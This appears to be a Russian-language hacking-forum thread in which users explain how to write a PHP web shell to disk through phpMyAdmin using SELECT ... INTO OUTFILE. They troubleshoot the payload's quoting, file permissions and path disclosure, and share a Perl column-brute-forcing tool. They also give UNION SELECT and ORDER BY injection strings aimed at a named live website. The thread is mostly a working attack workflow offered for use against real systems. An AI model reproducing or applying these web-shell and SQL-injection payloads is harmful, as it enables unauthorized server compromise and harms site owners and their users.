|
phpMyAdmin
у меня такой вопрос есть ли способ загрузить web shell через phpMyAdmin Если есть то пожалуйста обьясните как или дайте топик где это уже обьяснялося
|
хм
Средствами SQL например select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php' |
и как всегда помог Spyder
|
еще один вопрос можно ли сделать какую либо ошибку в базе данных или в phpMyAdmin что бы определить путь к домашней директории
|
Цитата:
Есть ли другой способ? |
Код:
http://www.google.ru/search?complete=1&hl=ru&newwindow=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=j4T&q=phpmyadmin+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr= |
Spyder, про гугль я и без тебя знаю. Думал, может на ачате помогут...Ладно будем искать...
|
Не найдено ни одного документа, соответствующего запросу phpmyadmin раскры% D1‚РёРµ путей.
Рекомендации: Убедитесь, что все слова написаны без ошибок. Попробуйте использовать другие ключевые слова. Попробуйте использовать более популярные ключевые слова. Попробуйте уменьшить количество слов в запросе. Вот что на твой запрос выдает |
Цитата:
|
спасибо а я то и не заметил
|
http://www.google.ru/search?q=phpmyadmin+раскрытие+путей
|
нужен скрипт на perl'e который быстро подбирает количество столбцов при sql инекциях у кого есть пожалуйста выложите давно такой ищу
|
https://forum.antichat.ru/thread28461.html
https://forum.antichat.ru/threadnav24918-1-40.html |
https://forum.antichat.ru/thread28461.html
по этой ссылке запускаю скрипт так C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'" мне выдает следующее C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'" =====_Script_Brut_Columns_===== Wed Dec 26 16:59:16 2007 *URL:___________http://zonewm.biz/showa.php?id=129' Evristic:______ON Min_columns:___1 Max_columns:___50 Metod:_________UNION SPACE:_________%20 NULL:__________1,2,3... POST-GET:______GET Time(sleep):___0 User-Agent:____useragent.txt PROXY:_________proxy.txt Log:___________log_check.txt =====_Script_Brut_Columns_===== GO! Start evristic detection. Please, WAIT... Detect MySQL Start UNION SELECT Please, wait... Try 1 column... ------------------------ OK! Find 1 columns. Right URL: http://zonewm.biz/showa.php?id=129'%20UNION%20SELECT%201/* что я не то делаю? |
http://zonewm.biz/showa.php?id=12%20union%20select%201,2,3,4,5,6,7,8/* рукми лучше всего =)
|
Цитата:
|
алгоритм
-1+order+by+1/* -1+order+by+100/* ошибка -> -1+order+by+50/* нет ошибки -> -1+order+by+75/* ошибка -> -1+order+by+61/* итд... heks, и логов меньше оставишь, и руку набьешь))) |
блин давно эотел найти такой запрос пасиб AFoST
|
Цитата:
Цитата:
Тоже самое. #1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php |
<?system($_GET['cmd'])?>
Обрами в "ковычки" |
Обратил. Дальше что? Должен появиться веб шелл по адресе http://sait.ru/phpBB/index.php ? Пробовал. Его там нет.
|
Во-первых должны быть права на запись. Во-вторых узнай полный путь до этой директории.
//локалхост Код:
select "<?system($_GET[cmd])?>" into outfile '/home/localhost/www/shell.php'; |
не надо там в кавычки ничего обрамлять
переведи этот пшп код в хекс например, ты вообще увеерн что у тебя права есть на запись файлов? |
Цитата:
~ указание существующей таблицы ~ абсолютный путь к файлу ~ обрамление ковычками абсолютного пути к файлу, что как следствие требует magic_quotes=OFF либо stripslashes запроса .. и тот кто реально хоть раз грузил так шелл, должен был это знать... PHP код:
|
Elekt, забыл код обрамить в кавычки
Я имел ввиду что надо делать так $_GET[cmd], а не так $_GET['cmd'] А вот про указание существующей таблицы - глупость Я у себя на локалке с успехом выполнял запрос select 1 into outfile '/tmp/123.txt' |
| Время: 22:51 |